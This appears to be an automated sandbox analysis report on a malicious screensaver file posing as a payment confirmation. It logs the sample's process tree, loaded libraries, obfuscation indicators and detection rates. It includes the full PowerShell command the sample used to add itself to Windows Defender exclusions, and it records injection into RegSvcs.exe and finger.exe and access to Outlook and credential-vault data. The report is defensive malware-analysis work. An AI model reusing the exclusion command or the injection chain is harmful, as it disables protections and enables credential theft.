Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: Payent confirmation copy 00888754087.scr	Virustotal: Detection: 57%
Source: Payent confirmation copy 00888754087.scr	ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr" /S
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr"
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
Source: C:\Windows\SysWOW64\finger.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr"	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\finger.exe

File opened: C:\Windows\SysWOW64\RichEd32.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\finger.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Payent confirmation copy 00888754087.scr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Payent confirmation copy 00888754087.scr

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Payent confirmation copy 00888754087.scr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: EVew.pdb source: Payent confirmation copy 00888754087.scr
Source:	Binary string: finger.pdb source: RegSvcs.exe, 00000003.00000002.388789742.0000000000834000.00000004.00000020.00020000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000002.866951455.0000000000414000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: EVew.pdbSHA256 source: Payent confirmation copy 00888754087.scr
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000003.00000002.388824636.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000003.389029493.0000000001F30000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000006.00000002.867123731.0000000002240000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000002.867123731.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000003.388630935.0000000001DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HP9gbzNVWxqFR.exe, 00000005.00000000.372400998.0000000000A6F000.00000002.00000001.01000000.00000009.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401709637.000000000007F000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Payent confirmation copy 00888754087.scr, Form3.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs	.Net Code: qDso2BSMRn System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payent confirmation copy 00888754087.scr.410000.1.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs	.Net Code: qDso2BSMRn System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payent confirmation copy 00888754087.scr.2855d80.2.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Binary contains a suspicious time stamp

Source: Payent confirmation copy 00888754087.scr

Static PE information: 0x9C1061E0 [Fri Dec 20 14:55:28 2052 UTC]

PE file contains sections with non-standard names

Source: sqlite3.dll.6.dr	Static PE information: section name: /4
Source: sqlite3.dll.6.dr	Static PE information: section name: /19
Source: sqlite3.dll.6.dr	Static PE information: section name: /31
Source: sqlite3.dll.6.dr	Static PE information: section name: /45
Source: sqlite3.dll.6.dr	Static PE information: section name: /57
Source: sqlite3.dll.6.dr	Static PE information: section name: /70
Source: sqlite3.dll.6.dr	Static PE information: section name: /81
Source: sqlite3.dll.6.dr	Static PE information: section name: /92

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004014F0 push FFFFFF89h; retn D8D9h	3_2_00401A97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004014F0 push ebx; retn F2A0h	3_2_00401B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042D963 push edi; iretd	3_2_0042D96C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00407109 push cs; iretd	3_2_0040710B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004149E2 push edi; retf	3_2_004149E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00406365 push ebx; ret	3_2_00406366
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00403370 push eax; ret	3_2_00403372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00417E8E push ebx; iretd	3_2_00417E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00414F55 push 00000079h; retf	3_2_00414F57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040D75B push ss; ret	3_2_0040D760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041870B pushad ; retf	3_2_0041870C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041AF95 push esi; iretd	3_2_0041AF97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A3DFA1 push ecx; ret	3_2_00A3DFB4

Source: Payent confirmation copy 00888754087.scr

Static PE information: section name: .text entropy: 7.80372244254093

Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, iCErSCKyoG3WA92F9d.cs	High entropy of concatenated method names: 'JnFWUNR6c4', 'STFWPpgN7e', 'MVJWBDIiQx', 'PISWT7Fs5O', 'LCbW15q6YI', 'EQXWuDtywd', 'xF1W0B9lYN', 'Jg2Ww1uIDG', 'kbVW88uiL1', 'h89WgeJSXA'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, x85usGnCwJnBeo8rDc.cs	High entropy of concatenated method names: 'gZMIC6XqPj', 'tgkIReoyrr', 'FvoIa8uFvu', 'CrNIqZVXJ3', 'utQIir4t6U', 'VCpIOIBoCd', 'WCXIArtjgL', 'e4SIMUsped', 'myUI5iKDu9', 'bUFIetarx2'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, rg35JuudNuuPPIfUtX.cs	High entropy of concatenated method names: 'Dispose', 'agG38UTXLa', 'ahDJqPAUtA', 'lZhF1JrQW4', 'waL3gJ6xkE', 'QhH3zxDPUe', 'ProcessDialogKey', 'aemJYptMIA', 'jRUJ3EaeDA', 'bPfJJYcU8H'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, snYq7vjt6RoVqfKG38.cs	High entropy of concatenated method names: 'zvr9a3NPuV', 'UvB9qb6srq', 'mdX9siTiD7', 'Hqw9i38FRK', 'H0g9OvDBn8', 'q4I9f1WQGe', 'MxJ9AaWCsO', 'Roe9Mg2wfq', 'DmV9rGGoTp', 'Tpy95DruYV'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, mHDMjBXdZAhCJgRv98.cs	High entropy of concatenated method names: 'zZqQkrKuOi', 'uvBQWXrxk4', 'HXrQnJM5HB', 'VwmQblhPQy', 'CltQva3dHH', 'Tn5n18cFOn', 'Dk3nuqhVMX', 'gQqn0WYeTd', 'kuQnwks0tZ', 'OrJn8Luj4K'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, APyjbyvbetLgTTfUX7.cs	High entropy of concatenated method names: 'oyy9G4rYka', 'JTP94UICWT', 'dY199liEP1', 'Hfp9LSHDLy', 'm4e9mqGE3C', 'PU89KQ9Xik', 'Dispose', 'oiaHV2XbX6', 'kiTHW8Dyme', 'GItHx75uek'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, pNd39XzPNIQr9WNHMd.cs	High entropy of concatenated method names: 'EFLtSyJiBG', 'bdPtC7rL3J', 'L74tRtBn4y', 'EWuta4rkgm', 'm9ntqB9e5w', 'thgticGRSo', 'bZ6tObvMKD', 'idgtKafOnU', 'vW1t74InP9', 'FIMt6UFtH5'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, W3xqtbssSmfMGuTvJuC.cs	High entropy of concatenated method names: 'CnttgCwOv3', 'VohtzFRGDd', 'UUsLYI9iyO', 'FKhL3YaRqC', 'yXuLJAVIui', 'Yg9LdxPUxL', 'AhuLo4vnxn', 'bmYLkgm6Rk', 't3JLVOtWrf', 'aQxLW8UBMn'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, efV8jdshvdLqdLIF0VS.cs	High entropy of concatenated method names: 'ToString', 'iElLCEHUA1', 'zeBLR5VhFg', 'shxLNlnAGt', 'NYPLanXipe', 'i8iLqTZGRp', 'r4ZLsvOYNU', 'b5lLiNcS0j', 'jQx6AwpKiyP9G33p797', 'XHI2JJp9YxkiwfATQZY'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs	High entropy of concatenated method names: 'bRddkoH7av', 'L2idVtbWQd', 'gNZdWqma8P', 'aJRdxEUbkS', 'hDNdnvmQ4x', 'O7IdQhKCTe', 'V12dbajUP7', 'PPbdvX4XPq', 'HZndyEsBd7', 'N3EdlWxyoL'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, QE5OneWd920YCRlW4g.cs	High entropy of concatenated method names: 'N7L3bh76XB', 'jYv3vs1yKD', 'rji3locMM5', 'pwM3DQ1gi3', 'lnM3GXMb6n', 'aiq3c3unL2', 'xHRENDytCIP9tFj3Ja', 'RWPXjyEHkXw3d58QGm', 'A0e33CNsxb', 'NKd3d1rIWu'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, FPx2LFNdTv2kEAw824.cs	High entropy of concatenated method names: 'tGKbVo0Kv9', 'loXbxePUbi', 'AVxbQ0gUgn', 'ffPQgATI7J', 'S2bQzjFGFF', 'm0IbYNZxl6', 'ChMb3NQ6QL', 'yvFbJucTnx', 'cvubdQtUwJ', 'xJjboCSjLT'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, Ac7xW4lpX9vRqwB4M6.cs	High entropy of concatenated method names: 'bYYxXRFENM', 'RM6xS4qhqO', 'D5CxCi3X5d', 'wc6xRMFT2x', 'zGlxG1AU1G', 'zUnxcq0Bvt', 'oJNx4rcAES', 'NfixHXbA6h', 'xsyx9wo0t9', 'xD6xtGgpod'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, dxEJ4JRcDccomymNei.cs	High entropy of concatenated method names: 'qsGtxfD4sR', 'HGrtnkKNqb', 'iMEtQUfFdi', 'ge5tbNPT8t', 'WIgt9AGYr6', 'zVwtvSckYf', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, GT0LXboupvvgGrnSAd.cs	High entropy of concatenated method names: 'FBFb7VEnng', 'yo9b68shdp', 'wLMb2k2OQo', 'SjCbX1SiOj', 'OuCbhTXv61', 'n9CbSqwMDD', 'CHhbpcV2Mh', 'GZ4bCKB3Tw', 'LjCbRW0G09', 'HJxbNJ8rpu'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, CZ3ugisWcyJYvmGu4he.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd3TF9pTkof', 'YS6FtQxEPM', 'D4PFLE7sdd', 'REmFFYRtJH', 'pRBFm04E65', 'JrlFZcr0qs', 'wl9FKMdsBE'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, p7jRKTZMejsJHeifIa.cs	High entropy of concatenated method names: 'xM24wmRAFv', 'QCj4gtaW9T', 'SeNHYhRYHV', 'doYH3VM7L4', 'bgT4e2v2Oe', 'Cc04jemCpq', 'roJ4E5JWJW', 'HUV4U2VAYx', 'fHv4PFnImL', 'VIA4BPpb61'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, EJ1ZyShAMUg15nQSfH.cs	High entropy of concatenated method names: 'Hmr2HFMTe', 'IqNX3OcBH', 'NBeS1LGiJ', 'TOMpxRbML', 'tLrRefH9U', 'o8jNScjqM', 'VRmNTr9wBSgHXMV7dF', 'KAyhyiXBpXimJnGXqf', 'T0kHE5jhw', 'VgftC2ZZG'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, Qh4VL4BqVBJ9QadaTR.cs	High entropy of concatenated method names: 'pR7nhZOgVQ', 'o8wnpkR2EF', 'mGbxsytUZ5', 'WFfxixkIYS', 'bUmxOynAXM', 'DQ7xfnoP0P', 'RcfxAePd03', 'GERxMLL5oQ', 'zkYxrOaG3Q', 'fuux5HaAED'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, iCErSCKyoG3WA92F9d.cs	High entropy of concatenated method names: 'JnFWUNR6c4', 'STFWPpgN7e', 'MVJWBDIiQx', 'PISWT7Fs5O', 'LCbW15q6YI', 'EQXWuDtywd', 'xF1W0B9lYN', 'Jg2Ww1uIDG', 'kbVW88uiL1', 'h89WgeJSXA'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, x85usGnCwJnBeo8rDc.cs	High entropy of concatenated method names: 'gZMIC6XqPj', 'tgkIReoyrr', 'FvoIa8uFvu', 'CrNIqZVXJ3', 'utQIir4t6U', 'VCpIOIBoCd', 'WCXIArtjgL', 'e4SIMUsped', 'myUI5iKDu9', 'bUFIetarx2'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, rg35JuudNuuPPIfUtX.cs	High entropy of concatenated method names: 'Dispose', 'agG38UTXLa', 'ahDJqPAUtA', 'lZhF1JrQW4', 'waL3gJ6xkE', 'QhH3zxDPUe', 'ProcessDialogKey', 'aemJYptMIA', 'jRUJ3EaeDA', 'bPfJJYcU8H'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, snYq7vjt6RoVqfKG38.cs	High entropy of concatenated method names: 'zvr9a3NPuV', 'UvB9qb6srq', 'mdX9siTiD7', 'Hqw9i38FRK', 'H0g9OvDBn8', 'q4I9f1WQGe', 'MxJ9AaWCsO', 'Roe9Mg2wfq', 'DmV9rGGoTp', 'Tpy95DruYV'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, mHDMjBXdZAhCJgRv98.cs	High entropy of concatenated method names: 'zZqQkrKuOi', 'uvBQWXrxk4', 'HXrQnJM5HB', 'VwmQblhPQy', 'CltQva3dHH', 'Tn5n18cFOn', 'Dk3nuqhVMX', 'gQqn0WYeTd', 'kuQnwks0tZ', 'OrJn8Luj4K'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, APyjbyvbetLgTTfUX7.cs	High entropy of concatenated method names: 'oyy9G4rYka', 'JTP94UICWT', 'dY199liEP1', 'Hfp9LSHDLy', 'm4e9mqGE3C', 'PU89KQ9Xik', 'Dispose', 'oiaHV2XbX6', 'kiTHW8Dyme', 'GItHx75uek'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, pNd39XzPNIQr9WNHMd.cs	High entropy of concatenated method names: 'EFLtSyJiBG', 'bdPtC7rL3J', 'L74tRtBn4y', 'EWuta4rkgm', 'm9ntqB9e5w', 'thgticGRSo', 'bZ6tObvMKD', 'idgtKafOnU', 'vW1t74InP9', 'FIMt6UFtH5'
